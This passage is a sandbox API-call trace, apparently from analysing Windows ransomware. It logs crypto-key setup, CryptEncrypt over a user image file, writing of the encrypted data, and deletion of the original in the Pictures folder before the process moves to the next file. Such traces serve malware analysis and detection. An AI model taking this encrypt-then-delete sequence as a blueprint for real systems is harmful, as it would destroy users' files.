[0093.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796f28 [0093.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0093.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0093.271] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2760, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2760*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9818 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0093.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0093.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0093.273] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0093.273] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.273] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0093.273] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.273] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caaf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0093.273] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x10cae, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x10cb0) returned 1 [0093.273] CharLowerBuffW (in: lpsz="byte[68785]", cchLength=0xb | out: lpsz="byte[68785]") returned 0xb [0093.274] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caef8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0093.274] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e538*=0x10cae, dwBufLen=0x10cb0 | out: pbData=0x499a008*, pdwDataLen=0x144e538*=0x10cb0) returned 1 [0093.274] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0093.274] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0093.274] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.276] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x10cb0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0x10cb0, lpOverlapped=0x0) returned 1 [0093.278] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0093.278] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43caa60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0093.279] CryptDestroyKey (hKey=0x41ac700) returned 1 [0093.279] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0093.279] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0093.279] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.279] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0093.279] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0093.279] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.279] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.279] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0093.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0093.279] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0093.279] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.279] FreeLibrary (hLibModule=0x756e0000) returned 1 [0093.279] CloseHandle (hObject=0x298) returned 1 [0093.280] CloseHandle (hObject=0x258) returned 1 [0093.332] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\AsLbgf0HCR8rP.jpg", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\AsLbgf0HCR8rP.jpg", lpFilePart=0x0) returned 0x31 [0093.332] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\AsLbgf0HCR8rP.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\aslbgf0hcr8rp.jpg")) returned 0x20 [0093.332] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\AsLbgf0HCR8rP.jpg", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83d02bf0, ftCreationTime.dwHighDateTime=0x1d5e17c, ftLastAccessTime.dwLowDateTime=0xfc322800, ftLastAccessTime.dwHighDateTime=0x1d5ebae, ftLastWriteTime.dwLowDateTime=0xfc322800, ftLastWriteTime.dwHighDateTime=0x1d5ebae, nFileSizeHigh=0x0, nFileSizeLow=0x10cae, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="AsLbgf0HCR8rP.jpg", cAlternateFileName="ASLBGF~1.JPG")) returned 0x41ac440 [0093.332] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\AsLbgf0HCR8rP.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\aslbgf0hcr8rp.jpg")) returned 1 [0093.385] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83d02bf0, ftCreationTime.dwHighDateTime=0x1d5e17c, ftLastAccessTime.dwLowDateTime=0xfc322800, ftLastAccessTime.dwHighDateTime=0x1d5ebae, ftLastWriteTime.dwLowDateTime=0xfc322800, ftLastWriteTime.dwHighDateTime=0x1d5ebae, nFileSizeHigh=0x0, nFileSizeLow=0x10cae, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="AsLbgf0HCR8rP.jpg", cAlternateFileName="ASLBGF~1.JPG")) returned 0 [0093.385] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0093.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e400 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0093.386] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0093.386] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0093.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0093.386] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0093.387] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0093.387] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0093.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0093.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2490 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0093.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0093.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0093.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0093.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0093.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0093.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0093.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0093.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0093.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca100 [0093.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0093.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0093.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0093.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0093.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0093.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0093.388] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0093.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0093.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0093.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0093.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0093.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0093.388] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0093.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0093.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0093.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0093.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0093.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0093.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0093.389] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\bflIcpkmQtP.png", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa782600, ftCreationTime.dwHighDateTime=0x1d5e4d7, ftLastAccessTime.dwLowDateTime=0x58d6c440, ftLastAccessTime.dwHighDateTime=0x1d5ee97, ftLastWriteTime.dwLowDateTime=0x58d6c440, ftLastWriteTime.dwHighDateTime=0x1d5ee97, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="bflIcpkmQtP.png", cAlternateFileName="BFLICP~1.PNG")) returned 0x41ac280 [0093.389] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0093.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0093.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0093.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0093.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0093.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0093.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0093.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0093.390] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0093.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0093.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0093.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0093.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0093.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0093.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0093.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0093.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0093.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca118 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0093.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0093.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 